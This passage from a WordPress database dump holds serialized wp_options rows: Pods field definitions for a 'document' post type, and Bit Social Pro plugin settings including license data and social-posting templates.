";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:2:{s:14:\"display_filter\";s:9:\"the_title\";s:19:\"display_filter_args\";a:1:{i:0;s:7:\"post_ID\";}}s:5:\"alias\";a:2:{i:0;s:5:\"title\";i:1;s:4:\"name\";}}s:12:\"post_content\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:12:\"post_content\";s:5:\"label\";s:7:\"Content\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"wysiwyg\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:25:\"wysiwyg_allowed_html_tags\";s:0:\"\";s:21:\"wysiwyg_media_buttons\";i:1;s:14:\"display_filter\";s:11:\"the_content\";s:8:\"pre_save\";i:0;}s:5:\"alias\";a:1:{i:0;s:7:\"content\";}}s:12:\"post_excerpt\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:12:\"post_excerpt\";s:5:\"label\";s:7:\"Excerpt\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:9:\"paragraph\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:20:\"paragraph_allow_html\";i:1;s:27:\"paragraph_allowed_html_tags\";s:0:\"\";s:14:\"display_filter\";s:11:\"the_excerpt\";s:8:\"pre_save\";i:0;}s:5:\"alias\";a:1:{i:0;s:7:\"excerpt\";}}s:11:\"post_author\";a:24:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_author\";s:5:\"label\";s:6:\"Author\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:16:\"pick_format_type\";s:6:\"single\";s:18:\"pick_format_single\";s:12:\"autocomplete\";s:13:\"default_value\";s:10:\"{@user.ID}\";s:21:\"default_evaluate_tags\";i:1;}s:5:\"alias\";a:1:{i:0;s:6:\"author\";}s:11:\"pick_object\";s:4:\"user\";s:8:\"pick_val\";s:4:\"user\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";}s:9:\"post_date\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_date\";s:5:\"label\";s:12:\"Publish Date\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:2:{i:0;s:7:\"created\";i:1;s:4:\"date\";}}s:13:\"post_date_gmt\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_date_gmt\";s:5:\"label\";s:18:\"Publish Date (GMT)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:11:\"post_status\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_status\";s:5:\"label\";s:6:\"Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:5:\"draft\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:11:\"post-status\";s:18:\"pick_format_single\";s:8:\"dropdown\";s:5:\"alias\";a:1:{i:0;s:6:\"status\";}}s:14:\"comment_status\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:14:\"comment_status\";s:5:\"label\";s:14:\"Comment Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:4:\"open\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:4:\"data\";a:2:{s:4:\"open\";s:4:\"Open\";s:6:\"closed\";s:6:\"Closed\";}}s:11:\"ping_status\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"ping_status\";s:5:\"label\";s:11:\"Ping Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:4:\"open\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:4:\"data\";a:2:{s:4:\"open\";s:4:\"Open\";s:6:\"closed\";s:6:\"Closed\";}s:20:\"hide_in_default_form\";b:1;}s:13:\"post_password\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_password\";s:5:\"label\";s:8:\"Password\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"password\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:20:\"hide_in_default_form\";b:1;}s:9:\"post_name\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_name\";s:5:\"label\";s:9:\"Permalink\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"slug\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:2:{i:0;s:4:\"slug\";i:1;s:9:\"permalink\";}}s:7:\"to_ping\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:7:\"to_ping\";s:5:\"label\";s:7:\"To Ping\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:6:\"pinged\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:6:\"pinged\";s:5:\"label\";s:6:\"Pinged\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"post_modified\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_modified\";s:5:\"label\";s:18:\"Last Modified Date\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:8:\"modified\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:17:\"post_modified_gmt\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:17:\"post_modified_gmt\";s:5:\"label\";s:24:\"Last Modified Date (GMT)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:21:\"post_content_filtered\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:21:\"post_content_filtered\";s:5:\"label\";s:18:\"Content (filtered)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:9:\"paragraph\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:7:{s:20:\"paragraph_allow_html\";i:1;s:16:\"paragraph_oembed\";i:1;s:21:\"paragraph_wptexturize\";i:1;s:23:\"paragraph_convert_chars\";i:1;s:17:\"paragraph_wpautop\";i:1;s:25:\"paragraph_allow_shortcode\";i:1;s:27:\"paragraph_allowed_html_tags\";s:0:\"\";}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:11:\"post_parent\";a:26:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_parent\";s:5:\"label\";s:6:\"Parent\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:9:\"post_type\";s:8:\"pick_val\";s:11:\"__current__\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";s:5:\"alias\";a:1:{i:0;s:6:\"parent\";}s:4:\"data\";a:0:{}s:6:\"hidden\";b:1;}s:4:\"guid\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:4:\"guid\";s:5:\"label\";s:4:\"GUID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:10:\"menu_order\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"menu_order\";s:5:\"label\";s:10:\"Menu Order\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:0:{}}s:9:\"post_type\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_type\";s:5:\"label\";s:4:\"Type\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:4:\"type\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:14:\"post_mime_type\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:14:\"post_mime_type\";s:5:\"label\";s:9:\"Mime Type\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"comment_count\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"comment_count\";s:5:\"label\";s:13:\"Comment Count\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:8:\"comments\";a:24:{s:2:\"id\";i:0;s:4:\"name\";s:8:\"comments\";s:5:\"label\";s:8:\"Comments\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"comment\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:19:\"comment_format_type\";s:5:\"multi\";}s:11:\"pick_object\";s:7:\"comment\";s:8:\"pick_val\";s:7:\"comment\";s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}}}','off'),(5597808,'bit_social_pro_license_data','a:3:{s:3:\"key\";s:24:\"6a1b30ff1e65fe0df17e527b\";s:6:\"status\";s:7:\"success\";s:8:\"expireIn\";s:10:\"2125-05-30\";}','auto'),(5597793,'bit_social_pro_tracking_skipped','1','auto'),(5597792,'bit_social_pro_tracking_notice_dismissed','1','auto'),(5597779,'bit_social_pro_installed','1780167520','on'),(5597780,'bit_social_pro_version','1.13.10','on'),(5597778,'bit_social_pro_db_version','1.2.0','on'),(5470738,'bit_social_templates_settings','a:13:{s:8:\"facebook\";a:3:{s:11:\"postingType\";s:11:\"onlyMessage\";s:7:\"content\";s:12:\"{post_title}\";s:11:\"trimMessage\";b:1;}s:8:\"linkedin\";a:3:{s:11:\"postingType\";s:11:\"onlyMessage\";s:7:\"content\";s:12:\"{post_title}\";s:11:\"trimMessage\";b:1;}s:7:\"twitter\";a:3:{s:11:\"postingType\";s:11:\"onlyMessage\";s:7:\"content\";s:12:\"{post_title}\";s:11:\"trimMessage\";b:1;}s:9:\"pinterest\";a:4:{s:11:\"postingType\";s:15:\"isFeaturedImage\";s:7:\"content\";s:12:\"{post_title}\";s:11:\"trimMessage\";b:1;s:10:\"isLinkCard\";b:0;}s:7:\"discord\";a:3:{s:11:\"postingType\";s:11:\"onlyMessage\";s:7:\"content\";s:12:\"{post_title}\";s:11:\"trimMessage\";b:1;}s:6:\"tumblr\";a:3:{s:11:\"postingType\";s:11:\"onlyMessage\";s:7:\"content\";s:12:\"{post_title}\";s:11:\"trimMessage\";b:1;}s:21:\"googleBusinessProfile\";a:4:{s:11:\"postingType\";s:11:\"onlyMessage\";s:7:\"content\";s:12:\"{post_title}\";s:6:\"button\";s:4:\"none\";s:11:\"trimMessage\";b:1;}s:7:\"threads\";a:5:{s:11:\"postingType\";s:11:\"onlyMessage\";s:7:\"content\";s:12:\"{post_title}\";s:7:\"comment\";s:0:\"\";s:5:\"topic\";s:0:\"\";s:11:\"trimMessage\";b:1;}s:9:\"instagram\";a:4:{s:11:\"postingType\";s:15:\"isFeaturedImage\";s:7:\"content\";s:12:\"{post_title}\";s:7:\"comment\";s:0:\"\";s:11:\"trimMessage\";b:1;}s:7:\"bluesky\";a:4:{s:11:\"postingType\";s:11:\"onlyMessage\";s:7:\"content\";s:12:\"{post_title}\";s:7:\"comment\";s:0:\"\";s:11:\"trimMessage\";b:1;}s:4:\"line\";a:3:{s:11:\"postingType\";s:11:\"onlyMessage\";s:7:\"content\";s:12:\"{post_title}\";s:11:\"trimMessage\";b:1;}s:8:\"telegram\";a:3:{s:11:\"postingType\";s:11:\"onlyMessage\";s:7:\"content\";s:12:\"{post_title}\";s:11:\"trimMessage\";b:1;}s:6:\"tiktok\";a:7:{s:12:\"allowComment\";b:1;s:7:\"content\";s:12:\"{post_title}\";s:4:\"duet\";b:0;s:11:\"postingType\";s:11:\"onlyMessage\";s:12:\"privacyLevel\";s:18:\"PUBLIC_TO_EVERYONE\";s:6:\"stitch\";b:0;s:11:\"trimMessage\";b:1;}}','auto'),(5642832,'jetpack_site_products','a:0:{}','on'),(5635220,'_transient_timeout_pods_c03da762a08ec72ee6f9c16b5b2dd70d','1782398266','off'),(5635218,'_transient_timeout_pods_c4e04716aec9de33a8f9b25f3a26ba39','1782398266','off'),(5635219,'_transient_pods_c4e04716aec9de33a8f9b25f3a26ba39','a:28:{s:11:\"object_type\";s:9:\"post_type\";s:4:\"type\";s:9:\"post_type\";s:11:\"object_name\";s:8:\"document\";s:19:\"object_hierarchical\";b:1;s:7:\"storage\";s:4:\"meta\";s:5:\"table\";s:8:\"wp_posts\";s:10:\"meta_table\";s:11:\"wp_postmeta\";s:9:\"pod_table\";s:16:\"wp_pods_document\";s:8:\"field_id\";s:2:\"ID\";s:11:\"field_index\";s:10:\"post_title\";s:10:\"field_slug\";s:9:\"post_name\";s:10:\"field_type\";s:9:\"post_type\";s:12:\"field_parent\";s:11:\"post_parent\";s:19:\"field_parent_select\";s:17:\"`t`.`post_parent`\";s:13:\"meta_field_id\";s:7:\"post_id\";s:16:\"meta_field_index\";s:8:\"meta_key\";s:16:\"meta_field_value\";s:10:\"meta_value\";s:12:\"pod_field_id\";s:2:\"id\";s:15:\"pod_field_index\";s:4:\"name\";s:14:\"pod_field_slug\";N;s:16:\"pod_field_parent\";N;s:4:\"join\";a:0:{}s:5:\"where\";a:1:{s:9:\"post_type\";s:28:\"`t`.`post_type` = \'document\'\";}s:13:\"where_default\";s:34:\"`t`.`post_status` IN ( \'publish\' )\";s:7:\"orderby\";s:51:\"`t`.`menu_order`, `t`.`post_title`, `t`.`post_date`\";s:3:\"pod\";O:16:\"Pods\\Whatsit\\Pod\":1:{s:7:\"\0*\0args\";a:70:{s:11:\"object_type\";s:3:\"pod\";s:19:\"object_storage_type\";s:9:\"post_type\";s:4:\"name\";s:8:\"document\";s:2:\"id\";i:419;s:6:\"parent\";s:0:\"\";s:5:\"group\";s:0:\"\";s:5:\"label\";s:18:\"Document Resources\";s:11:\"description\";s:0:\"\";s:6:\"weight\";i:0;s:25:\"_elementor_controls_usage\";a:0:{}s:14:\"label_singular\";s:17:\"Document Resource\";s:6:\"public\";s:1:\"1\";s:7:\"show_ui\";s:1:\"1\";s:14:\"supports_title\";s:1:\"1\";s:15:\"supports_editor\";s:1:\"1\";s:4:\"type\";s:9:\"post_type\";s:7:\"storage\";s:4:\"meta\";s:8:\"old_name\";s:8:\"document\";s:18:\"publicly_queryable\";s:1:\"1\";s:19:\"exclude_from_search\";s:1:\"0\";s:15:\"capability_type\";s:4:\"post\";s:22:\"capability_type_custom\";s:12:\"epa_resource\";s:21:\"capability_type_extra\";s:1:\"1\";s:11:\"has_archive\";s:1:\"1\";s:12:\"hierarchical\";s:1:\"1\";s:7:\"rewrite\";s:1:\"1\";s:18:\"rewrite_with_front\";s:1:\"1\";s:13:\"rewrite_feeds\";s:1:\"0\";s:13:\"rewrite_pages\";s:1:\"1\";s:9:\"query_var\";s:1:\"1\";s:10:\"can_export\";s:1:\"1\";s:14:\"default_status\";s:5:\"draft\";s:15:\"supports_author\";s:1:\"0\";s:18:\"supports_thumbnail\";s:1:\"1\";s:16:\"supports_excerpt\";s:1:\"0\";s:19:\"supports_trackbacks\";s:1:\"0\";s:22:\"supports_custom_fields\";s:1:\"0\";s:17:\"supports_comments\";s:1:\"0\";s:18:\"supports_revisions\";s:1:\"0\";s:24:\"supports_page_attributes\";s:1:\"0\";s:21:\"supports_post_formats\";s:1:\"0\";s:28:\"built_in_taxonomies_category\";s:1:\"0\";s:46:\"built_in_taxonomies_elementor_library_category\";s:1:\"0\";s:42:\"built_in_taxonomies_elementor_library_type\";s:1:\"0\";s:33:\"built_in_taxonomies_link_category\";s:1:\"0\";s:28:\"built_in_taxonomies_post_tag\";s:1:\"0\";s:37:\"built_in_taxonomies_resource_category\";s:1:\"1\";s:32:\"built_in_taxonomies_resource_tag\";s:1:\"1\";s:12:\"show_in_menu\";s:1:\"1\";s:13:\"menu_position\";s:1:\"0\";s:9:\"menu_icon\";s:19:\"dashicons-portfolio\";s:17:\"show_in_nav_menus\";s:1:\"1\";s:17:\"show_in_admin_bar\";s:1:\"1\";s:11:\"pfat_enable\";s:1:\"1\";s:21:\"pfat_run_outside_loop\";s:1:\"0\";s:18:\"pfat_append_single\";s:6:\"append\";s:18:\"pfat_filter_single\";s:11:\"the_content\";s:19:\"pfat_append_archive\";s:6:\"append\";s:19:\"pfat_filter_archive\";s:6:\"custom\";s:11:\"rest_enable\";s:1:\"0\";s:8:\"read_all\";s:1:\"0\";s:9:\"write_all\";s:1:\"0\";s:11:\"pfat_single\";s:27:\"Document Resources Template\";s:33:\"built_in_taxonomies_resource_type\";s:1:\"1\";s:41:\"built_in_taxonomies_institutions_category\";s:1:\"0\";s:26:\"supports_jetpack_publicize\";s:1:\"0\";s:25:\"supports_jetpack_markdown\";s:1:\"0\";s:39:\"built_in_taxonomies_elementor_font_type\";s:1:\"0\";s:28:\"built_in_taxonomies_wp_theme\";s:1:\"0\";s:26:\"pfat_filter_archive_custom\";s:11:\"the_content\";}}s:7:\"recurse\";b:1;s:13:\"object_fields\";a:28:{s:2:\"ID\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:2:\"ID\";s:5:\"label\";s:2:\"ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:1:{i:0;s:2:\"id\";}s:20:\"hide_in_default_form\";b:1;}s:10:\"post_title\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"post_title\";s:5:\"label\";s:5:\"Title\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:2:{s:14:\"display_filter\";s:9:\"the_title\";s:19:\"display_filter_args\";a:1:{i:0;s:7:\"post_ID\";}}s:5:\"alias\";a:2:{i:0;s:5:\"title\";i:1;s:4:\"name\";}}s:12:\"post_content\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:12:\"post_content\";s:5:\"label\";s:7:\"Content\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"wysiwyg\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:25:\"wysiwyg_allowed_html_tags\";s:0:\"\";s:21:\"wysiwyg_media_buttons\";i:1;s:14:\"display_filter\";s:1